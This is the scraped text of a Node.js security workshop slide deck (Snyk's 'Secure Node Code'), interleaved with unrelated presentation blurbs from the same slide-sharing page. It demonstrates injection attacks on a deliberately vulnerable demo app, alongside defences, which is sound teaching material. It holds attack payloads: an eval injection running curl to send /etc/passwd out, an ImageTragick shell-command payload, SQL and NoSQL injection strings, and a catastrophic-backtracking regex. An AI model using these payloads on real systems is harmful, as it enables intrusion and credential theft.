var HCHARS = /[&<>"']/,
AMP = /&/g,
LT = /</g,
GT = />/g,
QUOT = /"/g,
SQUOT = /'/g;
dust.escapeHtml = function(s) {
if (typeof s === 'string') {
if (!HCHARS.test(s)) {
return s;
return s.replace(AMP,'&amp;').replace(LT,'&lt;').


replace(SQUOT, '&#39;');
return s;
arrays not sanitized
http://host/navigation?device[]=x' eval(“'x'' == 'desktop'");
http://host/navigation?device[]=x eval("'x' == 'desktop'");
Paypal Exploit
eval("'xy'-require('child_process').exec('curl -F "x=`cat /etc/passwd`"')-'' == 'desktop'");

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Third party-performance (Airbnb Nerds, Nov 2013)
Third party-performance (Airbnb Nerds, Nov 2013)Third party-performance (Airbnb Nerds, Nov 2013)
Third party-performance (Airbnb Nerds, Nov 2013)

Almost every site on the internet today serves 3rd-party assets and code - jQuery, analytics, trackers, share buttons, ads - from both their own servers and others - cloud providers, dedicated hardware, CDNs, google hosting. These third parties can have a significant effect on performance, delaying the load event, deferring actions, and being a single point of failure beyond your control. This deck discusses techniques and strategies for working with 3rd parties within these limitations, and shares some relevant community work.

3rd partytag managementtech talk
Third Party Performance
Third Party PerformanceThird Party Performance
Third Party Performance

Third parties are a part of our reality, and offer great business value - but also present some very real performance concerns. This deck attempts to define and offer strategies, along with some practical tips, on how to deal with this problem.

3rd partywidgetsbeacons
A Picture Costs A Thousand Words
A Picture Costs A Thousand WordsA Picture Costs A Thousand Words
A Picture Costs A Thousand Words

Images seem simple - they're static, independent from each other, and don't mess up the DOM. However, images make up 60%-70% of page bytes, and their visual nature makes them critical for user experience. Investing in Image Optimization is a highly worthwhile investment. This presentation covers 4 aspects of Image Optimization: - Optimizing Image formats (including background on GIF, PNG, JPEG, WebP, JPEG XR and more) - Optimizing image delivery - Optimizing image loading in the page - Responsive Images - optimizing images for mobile screens
Example: mongoose
Let’s see this on Goof
Buffer tripped

many top packages
mongoose, request, sequelize, ws…
Dealing with Buffer

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Step by Step Mobile Optimization
Step by Step Mobile OptimizationStep by Step Mobile Optimization
Step by Step Mobile Optimization

(A presentation given at Velocity Conference, London 2012) Mobile Optimization is complicated, and there’s no single silver bullet. Many different bottlenecks take their toll along the way, and while some have a huge impact, others still add up. In this presentation, we’ll take a website and optimize it step by step. In each step we’ll touch on a problem, discuss how to solve it – perhaps in multiple ways – and show the effect of the solution. In the process, we’ll also touch on topics such as measuring mobile performance, differences between browsers, and which pitfalls are common

front-end optimizationvelocityconfvelocity conference london
Quantifying The Mobile Difference
Quantifying The Mobile DifferenceQuantifying The Mobile Difference
Quantifying The Mobile Difference

We all know Mobile is different, but by how much? This presentation attempts to quantify the difference between mobile and non-mobile, focusing on CPU, network and browser differences.

mobileperformance managementnumbers
Performance Implications of Mobile Design (Perf Audience Edition)
Performance Implications of Mobile Design (Perf Audience Edition)Performance Implications of Mobile Design (Perf Audience Edition)
Performance Implications of Mobile Design (Perf Audience Edition)

(This version of the presentation is oriented at a web performance audience, and includes some mobile design 101 content) Mobile Web Design is complicated, and several design paradigms have been created to help deal with the challenges the mobile landscape creates. Amongst other implications, each paradigm also carries its own performance pitfalls, which can turn a well designed site into a horribly slow user experience. This presentation covers the top design paradigms - Dedicated Websites (mdot) and Responsive Web Design, gives some background on each, and digs into the performance do's and don'ts for your design of choice.

responsive web designmobile web performance feomobile

zeroes memory*
* Requires Node.js 5 or newer
Default Buffer remains
Deprecated in Node 7
-- zero-fill-buffers:

makes Buffer(int)zero mem
Node command line flag.
May break packages…
How to defend?

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Performance Implications of Mobile Design
Performance Implications of Mobile DesignPerformance Implications of Mobile Design
Performance Implications of Mobile Design

Choosing your mobile design paradigm is hard, and performance is an often overlooked parameter in this decision process. This presentation discusses the top performance concerns for the top mobile design paradigms - Dedicated Sites (mdot) and Responsive Web Design (RWD). Presented at Breaking Dev (bdconf) in April, 2012.

responsive web designbdconfmobile
Unravelling Mobile Web Performance
Unravelling Mobile Web PerformanceUnravelling Mobile Web Performance
Unravelling Mobile Web Performance

The Mobile Web is a complicated beast, making Mobile Web Performance a tough problem to tackle. Is an iPad on WiFi a part of the Mobile Web? How about a laptop with a 3G stick? This presentation tries to split the Mobile Web into three categories, to make it more manageable: Network, Software & Hardware. For each, it reviews the performance challenges this category entails, and offers possible solutions to those challenges. A recording of this presentation (with audio) is available here:

mobile web performance feo
State Of Mobile Web Performance
State Of Mobile Web PerformanceState Of Mobile Web Performance
State Of Mobile Web Performance

Presentation from 17/3/2011 at the NY Web Performance Chapter about the iPhone/Android Comparison Study by (, presented by Guy Podjarny

androidblazemobile browsing
Validate type
Don’t assume you know what it is
Use Buffer.allocSafe()
Don’t use eval()
Especially for user-provided code
• Intro & Setup
• Insecure Code
• Encodings
• Type Manipulation
• Injection
• Event Loop
• Insecure Dependencies
• Summary

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Seamless PostgreSQL to Snowflake Data Transfer in 8 Simple Steps

Unlock the full potential of your data by effortlessly migrating from PostgreSQL to Snowflake, the leading cloud data warehouse. This comprehensive guide presents an easy-to-follow 8-step process using Estuary Flow, an open-source data operations platform designed to simplify data pipelines. Discover how to seamlessly transfer your PostgreSQL data to Snowflake, leveraging Estuary Flow's intuitive interface and powerful real-time replication capabilities. Harness the power of both platforms to create a robust data ecosystem that drives business intelligence, analytics, and data-driven decision-making. Key Takeaways: 1. Effortless Migration: Learn how to migrate your PostgreSQL data to Snowflake in 8 simple steps, even with limited technical expertise. 2. Real-Time Insights: Achieve near-instantaneous data syncing for up-to-the-minute analytics and reporting. 3. Cost-Effective Solution: Lower your total cost of ownership (TCO) with Estuary Flow's efficient and scalable architecture. 4. Seamless Integration: Combine the strengths of PostgreSQL's transactional power with Snowflake's cloud-native scalability and data warehousing features. Don't miss out on this opportunity to unlock the full potential of your data. Read & Download this comprehensive guide now and embark on a seamless data journey from PostgreSQL to Snowflake with Estuary Flow! Try it Free:

postgresqlsnowflakepostgres to snowflake
• Intro & Setup
• Insecure Code
• Encodings
• Type Manipulation
• Injection
• Event Loop
• Insecure Dependencies
• Summary

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Overview of ERP - Mechlin Technologies.pptx
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This PowerPoint presentation provides a comprehensive overview of Enterprise Resource Planning (ERP) systems. It covers the fundamental concepts, benefits, and key functionalities of ERP software, illustrating how it integrates various business processes into a unified system. From finance and HR to supply chain and customer relationship management, ERP facilitates efficient data management and decision-making across organizations. Whether you're new to ERP or looking to deepen your understanding, this presentation offers valuable insights into leveraging ERP for business success.

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Bitcoin heist prediction using ML

WEBINAR SLIDES: CCX for Cloud Service Providers
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Browse the slides from our recent webinar hosted by Divine Odazie, our tech evangelist.

cloudccxcloud services
Shell Injection
Goof Enhancement: 

Vuln cause 1: 

string concatenation
Vuln cause 2:


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In this talk, we will explore strategies to optimize the success rate of storing and retaining new information. We will discuss scientifically proven ideal learning intervals and content structures. Additionally, we will examine how to create an environment that improves our focus while you remain in the “flow”. Lastly we will also address the influence of AI on learning capabilities. In the dynamic field of software development, this knowledge will empower you to accelerate your learning curve and support others in their learning journeys.

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Example: git-ls-remote
Not all shell injections

are in your code…
• ImageMagick:

popular image manipulation binary/library
• May 2016: Multiple RCE vulns disclosed
• Trivial to exploit, highly severe, took >1 week to fix
• Primary vulnerability:
• Images are declared as one format, but auto-detected as SVG
• SVG processing holds multiple remote command execution

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Your project needs and long-term objectives will ultimately choose which of React Native and Flutter to use. For applications using JavaScript and current web technologies in particular, React Native is a mature and trustworthy choice. For projects that value performance and customizability across many platforms, Flutter, on the other hand, provides outstanding performance and a unified UI development experience.

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Ansys Mechanical enables you to solve complex structural engineering problems and make better, faster design decisions. With the finite element analysis (FEA) solvers available in the suite, you can customize and automate solutions for your structural mechanics problems and parameterize them to analyze multiple design scenarios. Ansys Mechanical is a dynamic tool that has a complete range of analysis tools.

mechanical engineeringmodelling software3d modelling software
push graphic-context
viewbox 0 0 640 480
fill 'url("|touch "./public/tragick)'
pop graphic-context
Exploitable on Goof
For you to try out at home…
Had no fix for a long while!
Required limiting in code
OSS Binaries are 

a part of your app
Unpleasant, but true

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Ansys Mechanical enables you to solve complex structural engineering problems and make better, faster design decisions. With the finite element analysis (FEA) solvers available in the suite, you can customize and automate solutions for your structural mechanics problems and parameterize them to analyze multiple design scenarios. Ansys Mechanical is a dynamic tool that has a complete range of analysis tools.

mechanical engineeringsoftware3d software
CViewSurvey Digitech Pvt Ltd that works on a proven C.A.A.G. model.
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CViewSurvey is a SaaS-based Web & Mobile application that provides digital transformation to traditional paper surveys and feedback for customer & employee experience, field & market research that helps you evaluate your customer's as well as employee's loyalty. With our unique C.A.A.G. Collect, Analysis, Act & Grow approach; business & industry’s can create customized surveys on web, publish on app to collect unlimited response & review AI backed real-time data analytics on mobile & tablets anytime, anywhere. Data collected when offline is securely stored in the device, which syncs to the cloud server when connected to any network.

saasapplicationdigital marketing
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ENISA Threat Landscape 2023
How to defend?
Avoid exec()
Use execFile()or spawn()instead
Track vulnerable binaries
More on that later…
NoSQL Injection

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Discover the fascinating world of Optical Character Recognition (OCR) technology with our comprehensive presentation. Learn how OCR converts various types of documents, such as scanned paper documents, PDFs, or images captured by a digital camera, into editable and searchable data. Dive into the history, modern applications, and future trends of OCR technology. Get step-by-step instructions on how to extract text from any image online for free using a simple tool, along with best practices for OCR image preparation. Ideal for professionals, students, and tech enthusiasts looking to harness the power of OCR.

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A robust software testing strategy encompassing functional and non-functional testing is fundamental for development teams. These twin pillars are essential for ensuring the success of your applications. But why are they so critical? Functional testing rigorously examines the application's processes against predefined requirements, ensuring they align seamlessly. Conversely, non-functional testing evaluates performance and reliability under load, enhancing the end-user experience.

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Classic SQL Injection
username = '$username'AND

password = '$password'
username = ‘ or 1=1—
username = ‘’or 1=1 --’AND password = 'bla'
Goof’s admin check
{username: req.body.username,
password: req.body.password},
function (err, users) {
// TODO: handle the rest

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An MVP (Minimum Viable Product) mobile application is a streamlined version of a mobile app that includes only the core features necessary to address the primary needs of its users. The purpose of an MVP is to validate the app concept with minimal resources, gather user feedback, and identify any areas for improvement before investing in a full-scale development. This approach allows businesses to quickly launch their app, test its market viability, and make data-driven decisions for future enhancements, ensuring a higher likelihood of success and user satisfaction.

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Shivam Pandit working on Php Web Developer.
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Shivam Pandit working on Php Web Developer.

Shivam Pandit Php Web Dveloper

Legitimate Use
{username: "admin",
password: "SuperSecretPass"},
function (err, users) {
// TODO: handle the rest
NoSQL Injection
{username: "admin",
password: {"$gt":""}},
function (err, users) {
// TODO: handle the rest
MongoDB Queries
How to defend?

Recommended for you
Validate Type
Sound familiar?
• Intro & Setup
• Insecure Code
• Encodings
• Type Manipulation
• Injection
• Event Loop
• Insecure Dependencies
• Summary
Event Loop

Recommended for you
Node = JavaScript = 1 thread
JS scales through events
as opposed to threads
Blocking actions 

natively async
I/O, system calls, etc.
Scales great!

Until a function goes wild…
Infinite loops, deep recursion, long-running algorithms …

Recommended for you
Which Algorithms 

are used most often?
Regular Expression

Denial of Service

Example: ms
Long String + 

Non-Linear Compute = 


Recommended for you
Example: moment
Catastrophic Backtracking
Regexp: /A(B|C+)*DE?/
Regexp: /A(B|C+)*DE?/


Recommended for you
Short String + 

Very Non-Linear Compute = 

How To Defend?
Prevent long running
Avoid nested 

unlimited length groups
More reading:

Recommended for you
Contain regexp input length
Limit execution time
for your own algorithms
Split & yield thread
during potentially long-running algorithms
Timing Attack

Recommended for you
A bit more esoteric…
What’s a Timing Attack?
Spot the Problem
function isAdminToken(token)
var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a-e6d0ddb8bbba";
if (token == ADMIN_UUID) {
return true;
return false;
Spot the Problem
function isAdminToken(token)
var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a-e6d0ddb8bbba";
if (token == ADMIN_UUID) {
return true;
return false;
Fails faster if first 

chars mismatch

Recommended for you
Worst case: 

Enumerate token per char
Constant Time Comparison
function isAdminToken(token)
var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a-e6d0ddb8bbba";
var mismatch = 0;
for (var i = 0; i < token.length; ++i) {
mismatch |= (token.charCodeAt(i) ^
return mismatch;
Constant Time Comparison
var scmp = require('scmp');
function isAdminToken(token)
var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a-e6d0ddb8bbba";
return scmp(token, admin);
Complex Timing Attacks

Recommended for you
How To Defend?
Use constant 

time processing
to avoid leaking sensitive information
• Intro & Setup
• Insecure Code
• Encodings
• Type Manipulation
• Injection
• Event Loop
• Insecure Dependencies
• Summary

Recommended for you
Vulnerable Binaries
Track your servers well
And the binaries within them
Update quickly & frequently

Recommended for you
Prevent exploits via code
e.g. imagemagick-safe
Vulnerable Packages
npm is a core part of

developing in Node.js

>350,000 packages 

~6B downloads/month
>65,000 publishers
npm usage 

Has Exploded

Recommended for you
Your App
Your Code
Your App
Each Dependency Is A
Security Risk
as we’ve just seen…

of npm Packages Carry 

Known Vulnerabilities
~83% of Snyk users found vulns in their apps
Source: Snyk data, Oct 2016

Recommended for you
How do I protect myself?
Back to Goof…
Securing OSS Packages
• Find vulnerabilities
• Be sure to test ALL your applications
• Fix vulnerabilities
• Upgrade when possible, patch when needed
• Prevent adding vulnerable module
• Break the build, test in pull requests
• Respond quickly to new vulns
• Track vuln DBs, or use Snyk! </shameless plug>
Not just Node/npm
Impacts Open Source Packages, wherever they are

Recommended for you
• Intro & Setup
• Insecure Code
• Encodings
• Type Manipulation
• Injection
• Event Loop
• Insecure Dependencies
• Summary
There’s A LOT we didn’t cover
• Security Headers
• Common misconfigurations
• Node.js runtime security
• Continous Security in CI/CD
• Happy to take questions on those…
• Node.js is awesome, and here to stay
• Security dialogue too low, needs your attention
• Educate & beware insecure code
• Both Node.js specific and general app sec issues
• Setup tools to handle insecure dependencies
• Continuously, and across all projects
Node.js Is Awesome

Recommended for you
Node.js Is Awesome
Please Enjoy Responsibly
Guy Podjarny
Danny Grander

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ENISA Threat Landscape 2023 documentation
What is OCR Technology and How to Extract Text from Any Image for Free
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Secure Node Code (workshop, O'Reilly Security)